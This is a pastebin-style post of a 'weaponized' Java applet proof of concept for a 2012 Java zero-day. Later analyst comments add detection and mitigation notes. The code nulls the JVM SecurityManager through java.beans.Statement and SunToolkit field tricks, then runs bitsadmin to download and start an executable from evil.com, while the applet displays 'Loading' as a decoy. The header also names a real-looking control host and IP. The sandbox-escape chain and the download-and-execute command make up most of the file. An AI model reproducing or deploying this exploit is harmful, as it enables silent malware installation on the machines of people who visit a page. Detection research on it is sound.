infodox

CVE-2012-XXXX Java 0day PoC

Aug 27th, 2012
Java 2.80 KB | None | 0 0
  1. //
  2. // CVE-2012-XXXX Java 0day
  3. //
  4. // reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
  5. //
  6. // secret host / ip : ok.aa24.net / 59.120.154.62
  7. //
  8. // regurgitated by jduck
  9. //
  10. // MSF module available
  11. //
  12. // This was my attempt at weaponizing the PoC - infodox
  13. // Have fun...
  14. //
  15. package cve2012xxxx;
  16.  
  17. import java.applet.Applet;
  18. import java.awt.Graphics;
  19. import java.beans.Expression;
  20. import java.beans.Statement;
  21. import java.lang.reflect.Field;
  22. import java.net.URL;
  23. import java.security.*;
  24. import java.security.cert.Certificate;
  25.  
  26. public class Gondvv extends Applet
  27. {
          /*
           * Analyst notes on this listing.
           *
           * Visible control flow: init() calls disableSecurity() and then passes a
           * command string to Runtime.exec(); paint() only draws the text "Loading".
           *
           * Technique as written: the sensitive calls are never made directly. They
           * are routed through java.beans.Statement and java.beans.Expression:
           * Class.forName("sun.awt.SunToolkit"), getField on that class, and
           * System.setSecurityManager with a null argument.
           *
           * Hunting pointers taken from this file: applet classes that combine
           * java.beans.Statement/Expression with the string constants
           * "sun.awt.SunToolkit", "getField", "acc" and "setSecurityManager";
           * the class/package names Gondvv and cve2012xxxx; a Java plug-in process
           * that spawns bitsadmin; and the host/IP named in the file header.
           *
           * Mitigation: apply the vendor's Java update for this CVE and disable
           * the Java browser plug-in on hosts that do not need applets.
           */
  28.  
          /** No-op constructor; all behaviour is in init(). */
  29.     public Gondvv()
  30.     {
  31.     }
  32.  
          /**
           * Replaces the JVM's SecurityManager with null.
           *
           * Steps, in the order the code performs them: build a Statement for
           * System.setSecurityManager whose single argument is the null element
           * of {@code new Object[1]}; build an AccessControlContext whose only
           * ProtectionDomain carries AllPermission (CodeSource "file:///", no
           * certificates); write that context into the Statement's "acc" field
           * through SetField; execute the Statement.
           *
           * NOTE(review): presumably Statement evaluates its call under the
           * context stored in "acc", which is why overwriting that one field is
           * enough to pass the permission check. Confirm against the JDK's
           * java.beans.Statement source.
           *
           * @throws Throwable whatever the reflective helpers or execute() raise
           */
  33.     public void disableSecurity()
  34.         throws Throwable
  35.     {
  36.         Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
  37.         Permissions localPermissions = new Permissions();
  38.         localPermissions.add(new AllPermission());
  39.         ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
  40.         AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
  41.             localProtectionDomain
  42.         });
              // The order matters: the context must be planted before execute() runs.
  43.         SetField(Statement.class, "acc", localStatement, localAccessControlContext);
  44.         localStatement.execute();
  45.     }
  46.  
          /**
           * Resolves a class by name indirectly: runs Class.forName(paramString)
           * through java.beans.Expression and returns the result cast to Class.
           *
           * NOTE(review): the indirection is presumably what lets sandboxed code
           * obtain a class from a restricted package; the only caller visible
           * here asks for "sun.awt.SunToolkit".
           *
           * @param paramString fully qualified class name
           * @return the Class produced by the Expression
           * @throws Throwable whatever Expression.execute()/getValue() raise
           */
  47.     private Class GetClass(String paramString)
  48.         throws Throwable
  49.     {
  50.         Object arrayOfObject[] = new Object[1];
  51.         arrayOfObject[0] = paramString;
  52.         Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
  53.         localExpression.execute();
  54.         return (Class)localExpression.getValue();
  55.     }
  56.  
          /**
           * Sets a named field on an object via sun.awt.SunToolkit.
           *
           * Invokes getField(paramClass, paramString) on the SunToolkit class
           * through java.beans.Expression, casts the result to Field, and calls
           * set(paramObject1, paramObject2) on it.
           *
           * NOTE(review): assumes getField hands back a Field that is already
           * accessible; the only call visible here targets Statement's "acc"
           * field. Confirm against the JDK source.
           *
           * @param paramClass   class that declares the field
           * @param paramString  field name
           * @param paramObject1 instance whose field is written
           * @param paramObject2 value to store
           * @throws Throwable whatever the reflective calls raise
           */
  57.     private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
  58.         throws Throwable
  59.     {
  60.         Object arrayOfObject[] = new Object[2];
  61.         arrayOfObject[0] = paramClass;
  62.         arrayOfObject[1] = paramString;
  63.         Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
  64.         localExpression.execute();
  65.         ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
  66.     }
  67.  
          /**
           * Applet entry point: calls disableSecurity(), then passes a command
           * string to Runtime.exec() and waits on the returned Process.
           *
           * The command literal names bitsadmin with a download URL and a local
           * .exe path, followed by a start of that file. The host in the literal
           * (evil.com) looks like a stand-in rather than a live indicator, so
           * treat it as such unless corroborated elsewhere.
           *
           * Detection: a JVM or browser plug-in process with a bitsadmin child
           * is the process-lineage signal this payload would produce.
           *
           * Any Throwable is caught and only printed with printStackTrace().
           */
  68.     public void init()
  69.     {
  70.         try
  71.         {
  72.             disableSecurity();
  73.             Process localProcess = null;
  74.             localProcess = Runtime.getRuntime().exec("bitsadmin /transfer myjob /download /priority high http://evil.com/lulz.exe c:\lulz.exe&start lulz.exe");
  75.             if(localProcess != null);
  76.                localProcess.waitFor();
  77.         }
  78.         catch(Throwable localThrowable)
  79.         {
  80.             localThrowable.printStackTrace();
  81.         }
  82.     }
  83.  
          /**
           * Draws the text "Loading" at (50, 25); nothing else is rendered.
           *
           * @param paramGraphics graphics context supplied by the applet container
           */
  84.     public void paint(Graphics paramGraphics)
  85.     {
  86.         paramGraphics.drawString("Loading", 50, 25);
  87.     }
  88. }